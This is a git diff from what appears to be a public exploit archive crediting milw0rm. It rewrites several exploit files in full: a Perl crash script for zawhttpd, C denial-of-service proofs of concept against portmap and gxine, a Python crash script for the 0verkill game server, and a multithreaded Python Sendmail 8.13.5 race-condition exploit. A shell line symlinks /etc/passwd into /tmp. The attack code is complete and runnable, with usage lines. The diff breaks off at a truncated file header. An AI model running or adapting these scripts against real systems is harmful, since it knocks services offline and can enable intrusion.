+# by Kamil 'K3' Sienicki
+
+use IO::Socket;
+use strict;
+
+my($socket) = "";
+
+if($socket = IO::Socket::INET->new(
+ PeerAddr => $ARGV[0],
+ PeerPort => $ARGV[1],
+ Proto => "TCP"))
+{
+ print "Attempting to kill zawhttpd at $ARGV[0]:$ARGV[1] ...";
+ print $socket "GET \\\\\\\\\\\\\\\\\\\\ HTTP/1.0\r\n\r\n";
+ close($socket);
+}
+else
+{
+ print "perl zawhttpd.pl localhost 80 \n";
+ print "Cannot connect to $ARGV[0]:$ARGV[1]\n";
+}
+#EoF
+
+# milw0rm.com [2006-05-04]
diff --git a/platforms/linux/dos/1815.c b/platforms/linux/dos/1815.c
index 8affea010..2e22da8b5 100755
--- a/platforms/linux/dos/1815.c
+++ b/platforms/linux/dos/1815.c
@@ -1,106 +1,106 @@ -///////////////////////////////////// -// portmap Set+Dump Local DoS - PoC -//////////////////////////////////// -// -// Federico L. Bossi Bonin -// fbossi[at]netcomm[dot]com[dot]ar -//////////////////////////////////// - -// Tested on Linux with version 5 - -// USE DEBUGGING MODE -///////////////////// - -// (gdb) backtrace -// #0 0xffffe410 in __kernel_vsyscall () -// #1 0xb7f21343 in write () from /lib/tls/libc.so.6 -// #2 0xb7f524d5 in svcfd_create () from /lib/tls/libc.so.6 -// #3 0xb7f5467a in xdrrec_create () from /lib/tls/libc.so.6 -// #4 0xb7f546f4 in xdrrec_create () from /lib/tls/libc.so.6 -// #5 0xb7f5350d in xdr_u_long () from /lib/tls/libc.so.6 -// #6 0xb7f4f48c in xdr_pmap () from /lib/tls/libc.so.6 -// #7 0xb7f54e3b in xdr_reference () from /lib/tls/libc.so.6 -// #8 0xb7f4f565 in xdr_pmaplist () from /lib/tls/libc.so.6 -// #9 0xb7f50025 in xdr_accepted_reply () from /lib/tls/libc.so.6 -// #10 0xb7f53cc5 in xdr_union () from /lib/tls/libc.so.6 -// #11 0xb7f50171 in xdr_replymsg () from /lib/tls/libc.so.6 -// #12 0xb7f5266e in svcfd_create () from /lib/tls/libc.so.6 -// #13 0xb7f50ddc in svc_sendreply () from /lib/tls/libc.so.6 -// #14 0x0804984d in reg_service (rqstp=0xbfecab4c, xprt=0xbfec872c) at portmap.c:515 -// #15 0xb7f51345 in svc_getreq_common () from /lib/tls/libc.so.6 -// #16 0xb7f5111d in svc_getreq_poll () from /lib/tls/libc.so.6 -// #17 0xb7f51979 in svc_run () from /lib/tls/libc.so.6 -// #18 0x080492dd in main (argc=134542752, argv=0xbfecb0e0) at portmap.c:303 - -#include -#include -#include -#include -#include -#include - -int i; -int len=600; -char myhost[256]; - -main(int argc, char *argv[]) { - -if (argc < 2) { -printf("usage:%s \n",argv[0]); -exit(1); -} - -if (argc >2) { len=atoi(argv[2]); } -if (len > 1024) { len=1024; } - -unsigned long PROGRAM=100000; -unsigned long VERSION=2; - -struct hostent *hp; -struct sockaddr_in server_addr; -int sock = RPC_ANYSOCK; -register CLIENT *client; -enum clnt_stat 
clnt_stat; -struct timeval timeout; -timeout.tv_sec = 40; -timeout.tv_usec = 0; - - -if ((hp = gethostbyname(argv[1])) == NULL) { -printf("Can't resolve %s\n",argv[1]); -exit(0); -} - -gethostname(myhost,255); -bcopy(hp->h_addr, (caddr_t)&server_addr.sin_addr,hp->h_length); -server_addr.sin_family = AF_INET; -server_addr.sin_port = 0; - -if ((client = clnttcp_create(&server_addr,PROGRAM,VERSION,&sock,1024,1024)) == NULL) { -clnt_pcreateerror("clnttcp_create"); -exit(0); -} - -client->cl_auth = authunix_create(myhost, 0, 0, 0, NULL); - -char *data = (char *) malloc(1024); -memset(data,0x0,strlen(data)); - -char *response = (char *) malloc(1024); -memset(response,0x0,strlen(response)); - -for (i = 0 ; i < len ; i++) { -memcpy(data+strlen(data),"1",1); -clnt_call(client,1,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout); -} - -clnt_call(client,4,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout); - -clnt_destroy(client); -close(sock); -free(data); -free(response); -exit(0); -} - -// milw0rm.com [2006-05-22] +///////////////////////////////////// +// portmap Set+Dump Local DoS - PoC +//////////////////////////////////// +// +// Federico L. 
Bossi Bonin +// fbossi[at]netcomm[dot]com[dot]ar +//////////////////////////////////// + +// Tested on Linux with version 5 + +// USE DEBUGGING MODE +///////////////////// + +// (gdb) backtrace +// #0 0xffffe410 in __kernel_vsyscall () +// #1 0xb7f21343 in write () from /lib/tls/libc.so.6 +// #2 0xb7f524d5 in svcfd_create () from /lib/tls/libc.so.6 +// #3 0xb7f5467a in xdrrec_create () from /lib/tls/libc.so.6 +// #4 0xb7f546f4 in xdrrec_create () from /lib/tls/libc.so.6 +// #5 0xb7f5350d in xdr_u_long () from /lib/tls/libc.so.6 +// #6 0xb7f4f48c in xdr_pmap () from /lib/tls/libc.so.6 +// #7 0xb7f54e3b in xdr_reference () from /lib/tls/libc.so.6 +// #8 0xb7f4f565 in xdr_pmaplist () from /lib/tls/libc.so.6 +// #9 0xb7f50025 in xdr_accepted_reply () from /lib/tls/libc.so.6 +// #10 0xb7f53cc5 in xdr_union () from /lib/tls/libc.so.6 +// #11 0xb7f50171 in xdr_replymsg () from /lib/tls/libc.so.6 +// #12 0xb7f5266e in svcfd_create () from /lib/tls/libc.so.6 +// #13 0xb7f50ddc in svc_sendreply () from /lib/tls/libc.so.6 +// #14 0x0804984d in reg_service (rqstp=0xbfecab4c, xprt=0xbfec872c) at portmap.c:515 +// #15 0xb7f51345 in svc_getreq_common () from /lib/tls/libc.so.6 +// #16 0xb7f5111d in svc_getreq_poll () from /lib/tls/libc.so.6 +// #17 0xb7f51979 in svc_run () from /lib/tls/libc.so.6 +// #18 0x080492dd in main (argc=134542752, argv=0xbfecb0e0) at portmap.c:303 + +#include +#include +#include +#include +#include +#include + +int i; +int len=600; +char myhost[256]; + +main(int argc, char *argv[]) { + +if (argc < 2) { +printf("usage:%s \n",argv[0]); +exit(1); +} + +if (argc >2) { len=atoi(argv[2]); } +if (len > 1024) { len=1024; } + +unsigned long PROGRAM=100000; +unsigned long VERSION=2; + +struct hostent *hp; +struct sockaddr_in server_addr; +int sock = RPC_ANYSOCK; +register CLIENT *client; +enum clnt_stat clnt_stat; +struct timeval timeout; +timeout.tv_sec = 40; +timeout.tv_usec = 0; + + +if ((hp = gethostbyname(argv[1])) == NULL) { +printf("Can't resolve 
%s\n",argv[1]); +exit(0); +} + +gethostname(myhost,255); +bcopy(hp->h_addr, (caddr_t)&server_addr.sin_addr,hp->h_length); +server_addr.sin_family = AF_INET; +server_addr.sin_port = 0; + +if ((client = clnttcp_create(&server_addr,PROGRAM,VERSION,&sock,1024,1024)) == NULL) { +clnt_pcreateerror("clnttcp_create"); +exit(0); +} + +client->cl_auth = authunix_create(myhost, 0, 0, 0, NULL); + +char *data = (char *) malloc(1024); +memset(data,0x0,strlen(data)); + +char *response = (char *) malloc(1024); +memset(response,0x0,strlen(response)); + +for (i = 0 ; i < len ; i++) { +memcpy(data+strlen(data),"1",1); +clnt_call(client,1,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout); +} + +clnt_call(client,4,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout); + +clnt_destroy(client); +close(sock); +free(data); +free(response); +exit(0); +} + +// milw0rm.com [2006-05-22] diff --git a/platforms/linux/dos/185.sh b/platforms/linux/dos/185.sh index c841fd3a7..bade2863c 100755 --- a/platforms/linux/dos/185.sh +++ b/platforms/linux/dos/185.sh @@ -9,6 +9,6 @@ # sinfony ln -s /etc/passwd /tmp/grep.tmp - - -# milw0rm.com [2000-11-17] + + +# milw0rm.com [2000-11-17] diff --git a/platforms/linux/dos/1852.c b/platforms/linux/dos/1852.c index a8f575499..241a78ef1 100755 --- a/platforms/linux/dos/1852.c +++ b/platforms/linux/dos/1852.c 
@@ -1,95 +1,95 @@ -////////////////////////////////////////////////////// -// gxine - HTTP Plugin Remote Buffer Overflow PoC -///////////////////////////////////////////////////// -// -// Federico L. Bossi Bonin -// fbossi[at]netcomm[dot]com[dot]ar -///////////////////////////////////////////////////// - -// TESTED on gxine 0.5.6 -//////////////////////// - -// 0xb78eccc7 in free () from /lib/tls/libc.so.6 -// (gdb) backtrace -// #0 0xb78eccc7 in free () from /lib/tls/libc.so.6 -// #1 0xb7438fc8 in ?? () from /usr/lib/xine/plugins/1.1.1/xineplug_inp_http.so -// #2 0x41414141 in ?? () -// #3 0xb7f42164 in ?? () from /usr/lib/libxine.so.1 -// #4 0x080b1810 in ?? () -// #5 0xb7f0e635 in xine_open () from /usr/lib/libxine.so.1 -// #6 0xb7f3967f in ?? () from /usr/lib/libxine.so.1 -// #7 0x0877c084 in ?? () -// #8 0x0930a931 in ?? () -// #9 0x080880a2 in defs.3 () -// #10 0xb0088478 in ?? () -// #11 0x00000000 in ?? () - -#include -#include -#include -#include -#define PORT 81 -#define LEN 9500 - -void shoot(int); - -int main() { -struct sockaddr_in srv_addr, client; -int len,pid,sockfd,sock; - -sockfd = socket(AF_INET, SOCK_STREAM, 0); - -if (sockfd < 0) { -perror("error socket()"); -exit(1); -} - -bzero((char *) &srv_addr, sizeof(srv_addr)); -srv_addr.sin_family = AF_INET; -srv_addr.sin_addr.s_addr = INADDR_ANY; -srv_addr.sin_port = htons(PORT); - -if (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0) { -perror("error bind()"); -exit(1); -} - - - -printf("Listening on port %i\n",PORT); - -listen(sockfd,5); -len = sizeof(client); - -while (1) { -sock = accept(sockfd, (struct sockaddr *) &client, &len); -if (sock < 0) { -perror("error accept()"); -exit(1); -} - -pid = fork(); -if (pid < 0) { -perror("fork()"); -exit(1); -} -if (pid == 0) { -close(sockfd); -printf("Conection from %s\n",inet_ntoa(client.sin_addr)); -shoot(sock); -exit(0); -} -else close(sock); -} -return 0; -} - -void shoot (int sock) { -int i; -for (i=0 ; i < LEN ; i++) { 
-write(sock,"\x41",1); -} - -} - -// milw0rm.com [2006-05-30] +////////////////////////////////////////////////////// +// gxine - HTTP Plugin Remote Buffer Overflow PoC +///////////////////////////////////////////////////// +// +// Federico L. Bossi Bonin +// fbossi[at]netcomm[dot]com[dot]ar +///////////////////////////////////////////////////// + +// TESTED on gxine 0.5.6 +//////////////////////// + +// 0xb78eccc7 in free () from /lib/tls/libc.so.6 +// (gdb) backtrace +// #0 0xb78eccc7 in free () from /lib/tls/libc.so.6 +// #1 0xb7438fc8 in ?? () from /usr/lib/xine/plugins/1.1.1/xineplug_inp_http.so +// #2 0x41414141 in ?? () +// #3 0xb7f42164 in ?? () from /usr/lib/libxine.so.1 +// #4 0x080b1810 in ?? () +// #5 0xb7f0e635 in xine_open () from /usr/lib/libxine.so.1 +// #6 0xb7f3967f in ?? () from /usr/lib/libxine.so.1 +// #7 0x0877c084 in ?? () +// #8 0x0930a931 in ?? () +// #9 0x080880a2 in defs.3 () +// #10 0xb0088478 in ?? () +// #11 0x00000000 in ?? () + +#include +#include +#include +#include +#define PORT 81 +#define LEN 9500 + +void shoot(int); + +int main() { +struct sockaddr_in srv_addr, client; +int len,pid,sockfd,sock; + +sockfd = socket(AF_INET, SOCK_STREAM, 0); + +if (sockfd < 0) { +perror("error socket()"); +exit(1); +} + +bzero((char *) &srv_addr, sizeof(srv_addr)); +srv_addr.sin_family = AF_INET; +srv_addr.sin_addr.s_addr = INADDR_ANY; +srv_addr.sin_port = htons(PORT); + +if (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0) { +perror("error bind()"); +exit(1); +} + + + +printf("Listening on port %i\n",PORT); + +listen(sockfd,5); +len = sizeof(client); + +while (1) { +sock = accept(sockfd, (struct sockaddr *) &client, &len); +if (sock < 0) { +perror("error accept()"); +exit(1); +} + +pid = fork(); +if (pid < 0) { +perror("fork()"); +exit(1); +} +if (pid == 0) { +close(sockfd); +printf("Conection from %s\n",inet_ntoa(client.sin_addr)); +shoot(sock); +exit(0); +} +else close(sock); +} +return 0; +} + +void shoot (int sock) { +int i; 
+for (i=0 ; i < LEN ; i++) { +write(sock,"\x41",1); +} + +} + +// milw0rm.com [2006-05-30] diff --git a/platforms/linux/dos/1894.py b/platforms/linux/dos/1894.py index d87cd4824..ca40f01fb 100755 --- a/platforms/linux/dos/1894.py +++ b/platforms/linux/dos/1894.py @@ -1,83 +1,83 @@ -#!/usr/bin/env python -# -# ----------------------------------------------------- -# Exploit id: FSE:016 -# -# Author: Federico Fazzi -# Contact: federico@autistici.org -# Date: 09/06/2006, 13:58 -# Sinthesis: 0verkill 0.16, Remote integer overflow -# Product: http://artax.karlin.mff.cuni.cz/~brain/0verkill/ -# ----------------------------------------------------- -# -# Start with: -# python f_0k-0.1.py -# - -# Proof of concept: -# (gdb) run -# Starting program: /home/federico/0verkill-0.16/server -# 9. 6.2006 14:18:07 Running 0verkill server version 0.16 -# 9. 6.2006 14:18:07 Initialization. -# 9. 6.2006 14:18:07 Loading sprites. -# 9. 6.2006 14:18:07 Loading level "level1".... -# 9. 6.2006 14:18:07 Loading level graphics. -# 9. 6.2006 14:18:08 Loading level map. -# 9. 6.2006 14:18:08 Loading level objects. -# 9. 6.2006 14:18:08 Initializing socket. -# 9. 6.2006 14:18:08 Installing signal handlers. -# 9. 6.2006 14:18:08 Game started. -# 9. 6.2006 14:18:08 Sleep -# 9. 6.2006 14:18:10 Wakeup -# -# (run python f_0k-0.6.py) -# -# Program received signal SIGSEGV, Segmentation fault. -# crc32 (buf=0x837a000
, len=4294967288) at crc32.c:82 -# warning: Source file is more recent than executable. -# 82 DO8(buf); -# -# #0 0x0805b54a in recv_packet (packet=0x805fd20 "", -# max_len=256, addr=0xf18df475, addr_len=0xf18df475, sender_server=0, recipient=0, -# sender=0xbfcf6d54) at net.c:94 -# 94 if (crc!=crc32(packet,retval-12))return -1; -# -# limits byte receive is 12, if you send an inferior number of it -# the game crash. - -import os, sys -from socket import * - -usage = "run: python %s [remote_addr] [remote_port] " % os.path.basename(sys.argv[0]) - -if len(sys.argv) < 3: - print usage - sys.exit() - -host = sys.argv[1] -port = int(sys.argv[2]) - -sock = socket(AF_INET, SOCK_DGRAM) -sock.connect((host, port)) - -print "connecting.. ", -if sock > 0: - print "done!" -else: - print "wrong!" - -print "crashing the server.. ", -if sock.sendto('0x00' , (host, port)): - print "done!" -else: - print "wrong!" - -print "wait five seconds, if no data found press CTRL+C" -try: - reply = sock.recvfrom(512) - print reply -except: - print "no data receive!" - sys.exit() - -# milw0rm.com [2006-06-09] +#!/usr/bin/env python +# +# ----------------------------------------------------- +# Exploit id: FSE:016 +# +# Author: Federico Fazzi +# Contact: federico@autistici.org +# Date: 09/06/2006, 13:58 +# Sinthesis: 0verkill 0.16, Remote integer overflow +# Product: http://artax.karlin.mff.cuni.cz/~brain/0verkill/ +# ----------------------------------------------------- +# +# Start with: +# python f_0k-0.1.py +# + +# Proof of concept: +# (gdb) run +# Starting program: /home/federico/0verkill-0.16/server +# 9. 6.2006 14:18:07 Running 0verkill server version 0.16 +# 9. 6.2006 14:18:07 Initialization. +# 9. 6.2006 14:18:07 Loading sprites. +# 9. 6.2006 14:18:07 Loading level "level1".... +# 9. 6.2006 14:18:07 Loading level graphics. +# 9. 6.2006 14:18:08 Loading level map. +# 9. 6.2006 14:18:08 Loading level objects. +# 9. 6.2006 14:18:08 Initializing socket. +# 9. 
6.2006 14:18:08 Installing signal handlers. +# 9. 6.2006 14:18:08 Game started. +# 9. 6.2006 14:18:08 Sleep +# 9. 6.2006 14:18:10 Wakeup +# +# (run python f_0k-0.6.py) +# +# Program received signal SIGSEGV, Segmentation fault. +# crc32 (buf=0x837a000
, len=4294967288) at crc32.c:82 +# warning: Source file is more recent than executable. +# 82 DO8(buf); +# +# #0 0x0805b54a in recv_packet (packet=0x805fd20 "", +# max_len=256, addr=0xf18df475, addr_len=0xf18df475, sender_server=0, recipient=0, +# sender=0xbfcf6d54) at net.c:94 +# 94 if (crc!=crc32(packet,retval-12))return -1; +# +# limits byte receive is 12, if you send an inferior number of it +# the game crash. + +import os, sys +from socket import * + +usage = "run: python %s [remote_addr] [remote_port] " % os.path.basename(sys.argv[0]) + +if len(sys.argv) < 3: + print usage + sys.exit() + +host = sys.argv[1] +port = int(sys.argv[2]) + +sock = socket(AF_INET, SOCK_DGRAM) +sock.connect((host, port)) + +print "connecting.. ", +if sock > 0: + print "done!" +else: + print "wrong!" + +print "crashing the server.. ", +if sock.sendto('0x00' , (host, port)): + print "done!" +else: + print "wrong!" + +print "wait five seconds, if no data found press CTRL+C" +try: + reply = sock.recvfrom(512) + print reply +except: + print "no data receive!" + sys.exit() + +# milw0rm.com [2006-06-09] diff --git a/platforms/linux/dos/2051.py b/platforms/linux/dos/2051.py index 0a4866fd6..8118d4de2 100755 --- a/platforms/linux/dos/2051.py +++ b/platforms/linux/dos/2051.py 
@@ -1,297 +1,297 @@ -#!/usr/bin/env python -# -# redsand@blacksecurity.org -# Sendmail 8.13.5 and below Remote Signal Handling exploit -# usage: rbl4ck-sendmail.py 127.0.0.1 0 25 -# -# - -# this exploit was leaked to the PHC (Phrack High Council) -# so instead of only letting them have a copy, we figure -# everyone should have what they have. -# -# :-) - -# -# several of the tested operating systems appear to crash at a static -# string in memory and we were unable to shift the location of that crash. -# However, Fedora gives us a nice sexy soft spot to land, one that allows us -# to control the flow of code execution -# this is only a proof of concept -# - -import os, sys, socket, time, select, string, errno, threading - -IP="127.0.0.1" -PORT=25 -fromdd = "w00t@bex.redsand.net" -def_arch = 0 -def_timeout = (60 * 60) * 2 # 2 hrs -#def_timeout = 5 # 5 seconds -domain = "localhost" -total_time = None -threshold = 2.5 - -guess_timeout = 4.0 - -threads = 40 - -arch = [ - { 'OS':'Debian 3.0-r1', 'offset':190, 'pad':28, 'return':0xbfbfdad1L } - ] - -argc = len(sys.argv) -if(argc > 1): - IP = sys.argv[1] - -if(argc > 2): - def_arch = int(sys.argv[2]) - -if(argc > 3): - PORT = int(sys.argv[3]) - -def ia32(o): - s='' - w=chr(i % 256) - o = o >> 8 - x=chr(i % 256) - o = o >> 8 - y=chr(i % 256) - o = o >> 8 - z=chr(i % 256) - - s = "%c%c%c%c" % (w,x,y,z) - return s - -def substr(i, str, off): - top=i[:off] - end=i[off+len(str):] - s = top + str + end - return s - - - -def rout( str): - print ("[bl4ck]: " + str) - -def mbanner(): - rout("Sendmail 8.13.5 and below Remote Signal Handling exploit by redsand@blacksecurity.org") - rout("Supported Operating Systems:") - p = 0 - for i in arch: - rout("{%r} %s" % (p, i['OS'])) - p += 1 - -def rsend( s, str, p=True): - sent = s.send(str ) - #sent = s.send(str + "\r\n") - if sent == 0: - rout("socket send() failed") - if(p): - rout("Sent Request: \r\n\r\n%s\r\n" % str) - -def probe(sock): - str = "HELO blacksecurity.org\r\nMAIL FROM: 
<%s>\r\nRCPT TO: root@%s\r\nDATA\r\n" % (fromdd,domain) - rsend(sock,str) - - -def payload(size=32764): - ret = "\x7f" * size - i = 0 - while i < size : - ret = substr(ret,": ",100 + i) - ret = substr(ret,"\r\n",200 + i) - i += 202 - - ret += "\r\n" - return ret - - -class rSendmail( threading.Thread) : - - thres = threshold - do_exit = False - btime = None - etime = None - state = 0 - total_time = 0 - - def __init__(self, thresh=0): - if not thresh == 0: - self.thres = thresh - threading.Thread.__init__ ( self ) - - - def rrecv(self,s, response=None): - buf = '' - try: - buf = s.recv(2048) - except socket.error, (ecode, reason): - #rout("Socket failure %r:%s" % (ecode, reason)) - return False - - if buf == '': - return False - - rout("Reading response: \r\n\r\n%s\r\n" % buf[0:-2]) - msg = buf[0:-2].split("\r\n") - for m in msg: - - k = m[0:3] - if (k != None) and (k != '') and (k != "\x7f\x7f\x7f"): - code = int(m[0:3]) - else: - code = 0 - - if( code == 354 and self.state == 0 ): - self.btime = time.time() - self.state += 1 - return True - elif( code == 451 and self.state == 1): - self.etime = time.time() - self.state += 1 - return True - elif( code == 451 and self.state == 4): - self.state += 1 - return True - elif( code == 354 and self.state == 3): - self.state += 1 - return True - - if (self.state == 5): - self.state += 1 - rout("Debug error, unable to escalate state") - self.stop() - return False - - if(response != None): - rsend(s,response) - - def stop(self): - self.do_exit = True - - - def run (self ): - - rout("Connecting to %s:%r" % (IP,PORT)) - - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - sock.setblocking(0) # non-blocking 0hn0 - - try: - sock.connect((IP, PORT)) - except socket.error, (ecode, reason): - if ecode in (115, 150): pass - else: - rout("Error %r:%s" % (ecode,reason)) - return - - ret = select.select([sock],[sock],[], def_timeout) - - if len(ret[1]) == 0 and len 
(ret[0]) == 0: - sock.close() - rout("Timed out on connect") - return - - rout("Setting non-blocking options with a default timeout of %r seconds" % def_timeout) - - xplbuf = "\xAF\xBE\xAD\xDE" - - probe1 = False - probe2 = False - pump = False - - while not self.do_exit: - - readsock, writesock, err = select.select([sock],[sock],[], def_timeout) - if len(readsock) > 0: - for s in readsock: - self.rrecv(s) - - if len(writesock) > 0: - for s in writesock: - if(self.state == 0): - if not probe1: - probe(s) # rsend(s,"HELO") - probe1 = True - break - - if(self.state == 1): - if not pump: - pump = True - time.sleep(guess_timeout - (0.9)) - rsend(s,payload(32764) + "\r\n", False) - rout("Sending heavy load") - - break - - if(self.state == 2): - # measure timeout - # wait = end - start - # where end is time of code 451 & start is 354 go ahead - self.total_time = (self.etime - self.btime) + self.thres - #self.total_time = (self.etime - self.btime) - self.state += 1 - - if(self.state == 3): - if not probe2: - rsend(s,"\n") - probe(s) - probe2 = True - break - - if(self.state == 4): - ## race here - # send bad header - # lets wait - rsend(s, xplbuf + "\r\n") - rout("Sleeping...") - time.sleep(self.total_time) - rsend(s, xplbuf + "\r\n") - - rout("Sent race-request") - self.state = 5 - break - - if(self.state == 5): - rout("State reached stage: %r" % self.state) - rout("Total wait time: %s" % self.total_time) - self.stop() - break - - self.stop() - return - - - - -mbanner() - -t_list = [] - -t = threshold - -opc = 0 - -while threading.activeCount() < threads: - opc += 1 - rout("Starting Thread: %r with time+offset: %r" % (opc, t)) - m = rSendmail(t) - m.start() - t += 0.2 - time.sleep(5) - - -sys.exit(5) # success ?? 
- -""" -buf = "" -atom = "\\\xff" * int(arch[def_arch]['pad']) -idx = 256 * 4 -newtag=substr(xpl[idx:],ia32(arch[def_arch]['return']), int(arch[def_arch]['offset'])) -xpl=substr(xpl, newtag, idx) -xpl=substr(xpl,atom,len(xpl)) -""" - -# milw0rm.com [2006-07-21] +#!/usr/bin/env python +# +# redsand@blacksecurity.org +# Sendmail 8.13.5 and below Remote Signal Handling exploit +# usage: rbl4ck-sendmail.py 127.0.0.1 0 25 +# +# + +# this exploit was leaked to the PHC (Phrack High Council) +# so instead of only letting them have a copy, we figure +# everyone should have what they have. +# +# :-) + +# +# several of the tested operating systems appear to crash at a static +# string in memory and we were unable to shift the location of that crash. +# However, Fedora gives us a nice sexy soft spot to land, one that allows us +# to control the flow of code execution +# this is only a proof of concept +# + +import os, sys, socket, time, select, string, errno, threading + +IP="127.0.0.1" +PORT=25 +fromdd = "w00t@bex.redsand.net" +def_arch = 0 +def_timeout = (60 * 60) * 2 # 2 hrs +#def_timeout = 5 # 5 seconds +domain = "localhost" +total_time = None +threshold = 2.5 + +guess_timeout = 4.0 + +threads = 40 + +arch = [ + { 'OS':'Debian 3.0-r1', 'offset':190, 'pad':28, 'return':0xbfbfdad1L } + ] + +argc = len(sys.argv) +if(argc > 1): + IP = sys.argv[1] + +if(argc > 2): + def_arch = int(sys.argv[2]) + +if(argc > 3): + PORT = int(sys.argv[3]) + +def ia32(o): + s='' + w=chr(i % 256) + o = o >> 8 + x=chr(i % 256) + o = o >> 8 + y=chr(i % 256) + o = o >> 8 + z=chr(i % 256) + + s = "%c%c%c%c" % (w,x,y,z) + return s + +def substr(i, str, off): + top=i[:off] + end=i[off+len(str):] + s = top + str + end + return s + + + +def rout( str): + print ("[bl4ck]: " + str) + +def mbanner(): + rout("Sendmail 8.13.5 and below Remote Signal Handling exploit by redsand@blacksecurity.org") + rout("Supported Operating Systems:") + p = 0 + for i in arch: + rout("{%r} %s" % (p, i['OS'])) + p += 1 + +def 
rsend( s, str, p=True): + sent = s.send(str ) + #sent = s.send(str + "\r\n") + if sent == 0: + rout("socket send() failed") + if(p): + rout("Sent Request: \r\n\r\n%s\r\n" % str) + +def probe(sock): + str = "HELO blacksecurity.org\r\nMAIL FROM: <%s>\r\nRCPT TO: root@%s\r\nDATA\r\n" % (fromdd,domain) + rsend(sock,str) + + +def payload(size=32764): + ret = "\x7f" * size + i = 0 + while i < size : + ret = substr(ret,": ",100 + i) + ret = substr(ret,"\r\n",200 + i) + i += 202 + + ret += "\r\n" + return ret + + +class rSendmail( threading.Thread) : + + thres = threshold + do_exit = False + btime = None + etime = None + state = 0 + total_time = 0 + + def __init__(self, thresh=0): + if not thresh == 0: + self.thres = thresh + threading.Thread.__init__ ( self ) + + + def rrecv(self,s, response=None): + buf = '' + try: + buf = s.recv(2048) + except socket.error, (ecode, reason): + #rout("Socket failure %r:%s" % (ecode, reason)) + return False + + if buf == '': + return False + + rout("Reading response: \r\n\r\n%s\r\n" % buf[0:-2]) + msg = buf[0:-2].split("\r\n") + for m in msg: + + k = m[0:3] + if (k != None) and (k != '') and (k != "\x7f\x7f\x7f"): + code = int(m[0:3]) + else: + code = 0 + + if( code == 354 and self.state == 0 ): + self.btime = time.time() + self.state += 1 + return True + elif( code == 451 and self.state == 1): + self.etime = time.time() + self.state += 1 + return True + elif( code == 451 and self.state == 4): + self.state += 1 + return True + elif( code == 354 and self.state == 3): + self.state += 1 + return True + + if (self.state == 5): + self.state += 1 + rout("Debug error, unable to escalate state") + self.stop() + return False + + if(response != None): + rsend(s,response) + + def stop(self): + self.do_exit = True + + + def run (self ): + + rout("Connecting to %s:%r" % (IP,PORT)) + + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.setblocking(0) # non-blocking 0hn0 + + try: + 
sock.connect((IP, PORT)) + except socket.error, (ecode, reason): + if ecode in (115, 150): pass + else: + rout("Error %r:%s" % (ecode,reason)) + return + + ret = select.select([sock],[sock],[], def_timeout) + + if len(ret[1]) == 0 and len (ret[0]) == 0: + sock.close() + rout("Timed out on connect") + return + + rout("Setting non-blocking options with a default timeout of %r seconds" % def_timeout) + + xplbuf = "\xAF\xBE\xAD\xDE" + + probe1 = False + probe2 = False + pump = False + + while not self.do_exit: + + readsock, writesock, err = select.select([sock],[sock],[], def_timeout) + if len(readsock) > 0: + for s in readsock: + self.rrecv(s) + + if len(writesock) > 0: + for s in writesock: + if(self.state == 0): + if not probe1: + probe(s) # rsend(s,"HELO") + probe1 = True + break + + if(self.state == 1): + if not pump: + pump = True + time.sleep(guess_timeout - (0.9)) + rsend(s,payload(32764) + "\r\n", False) + rout("Sending heavy load") + + break + + if(self.state == 2): + # measure timeout + # wait = end - start + # where end is time of code 451 & start is 354 go ahead + self.total_time = (self.etime - self.btime) + self.thres + #self.total_time = (self.etime - self.btime) + self.state += 1 + + if(self.state == 3): + if not probe2: + rsend(s,"\n") + probe(s) + probe2 = True + break + + if(self.state == 4): + ## race here + # send bad header + # lets wait + rsend(s, xplbuf + "\r\n") + rout("Sleeping...") + time.sleep(self.total_time) + rsend(s, xplbuf + "\r\n") + + rout("Sent race-request") + self.state = 5 + break + + if(self.state == 5): + rout("State reached stage: %r" % self.state) + rout("Total wait time: %s" % self.total_time) + self.stop() + break + + self.stop() + return + + + + +mbanner() + +t_list = [] + +t = threshold + +opc = 0 + +while threading.activeCount() < threads: + opc += 1 + rout("Starting Thread: %r with time+offset: %r" % (opc, t)) + m = rSendmail(t) + m.start() + t += 0.2 + time.sleep(5) + + +sys.exit(5) # success ?? 
+ +""" +buf = "" +atom = "\\\xff" * int(arch[def_arch]['pad']) +idx = 256 * 4 +newtag=substr(xpl[idx:],ia32(arch[def_arch]['return']), int(arch[def_arch]['offset'])) +xpl=substr(xpl, newtag, idx) +xpl=substr(xpl,atom,len(xpl)) +""" + +# milw0rm.com [2006-07-21] diff --git a/platforms/linux/dos/236.sh b/platforms/linux/dos/236.sh index 29eada268..0e00311f9 100755 --- a/platforms/linux/dos/236.sh +++ b/platforms/linux/dos/236.sh @@ -15,6 +15,6 @@ while /bin/true ; do done unset i - - -# milw0rm.com [2001-01-02] + + +# milw0rm.com [2001-01-02] diff --git a/platforms/linux/dos/238.c b/platforms/linux/dos/238.c index ffe48c92d..41f0d766d 100755 --- a/platforms/linux/dos/238.c +++ b/platforms/linux/dos/238.c @@ -37,6 +37,6 @@ int main(int argc, char **argv) } return 0; } - - -// milw0rm.com [2001-01-03] + + +// milw0rm.com [2001-01-03] diff --git a/platforms/linux/dos/251.c b/platforms/linux/dos/251.c index 005b1ecc0..cd5ca72ad 100755 --- a/platforms/linux/dos/251.c +++ b/platforms/linux/dos/251.c @@ -138,6 +138,6 @@ int main(int argc, char **argv) return 0; } - - -// milw0rm.com [2001-01-15] + + +// milw0rm.com [2001-01-15] diff --git a/platforms/linux/dos/274.c b/platforms/linux/dos/274.c index ff915bbb4..e0b9cb6f0 100755 --- a/platforms/linux/dos/274.c +++ b/platforms/linux/dos/274.c @@ -86,6 +86,6 @@ exit (1); } - - -// milw0rm.com [2004-04-21] + + +// milw0rm.com [2004-04-21] diff --git a/platforms/linux/dos/2892.py b/platforms/linux/dos/2892.py index 7fad500ef..4e2404814 100755 --- 